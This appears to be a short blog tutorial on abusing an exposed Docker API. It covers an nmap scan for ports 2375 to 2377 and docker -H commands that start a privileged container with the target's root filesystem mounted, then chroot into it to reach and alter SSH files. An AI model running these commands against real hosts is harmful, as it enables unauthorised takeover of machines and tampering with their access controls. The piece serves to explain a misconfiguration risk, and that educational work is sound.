Docker API Abuse
The docker API basically is an interface between docker daemon and docker image. The docker API is exposed via a Unix Socket at /var/run/docker.sock by default.The Docker daemon(server) uses this socket to listen to the API and the clients(docker images) use the socket to send API requests to the daemon. The image below shows the basic docker architecture:
When the docker API is accessed over TCP connection through docker ports like 2375,2376 and 2377, the docker client can access(or remote access) the docker daemon, which is running outside the host. In this blog we will see why exposing the docker API on the internet is a tremendous risk.
1.We start with a simple nmap scan to discover opened docker ports.Command: nmap -p2375,2376,2377 192.168.1.0/24
2.As we can see in the above image, we found machine(192.168.1.40) having swarm port already opened. Checking our own ip.
3.Now we will run a misconfigured docker image from our machine (remotely) into the target machine(192.168.1.40). The command:
docker -H 192.168.1.40:2377 run -it — privileged — net host -v /:/host ubuntu /bin/bash
4.Moreover, if we run the above docker command making chroot inside container, we get the access to ssh folder wherein we can manipulate the ssh files.The command:
docker -H 192.168.1.40:2377 run -it — privileged — net host -v /:/host ubuntu chroot /host bash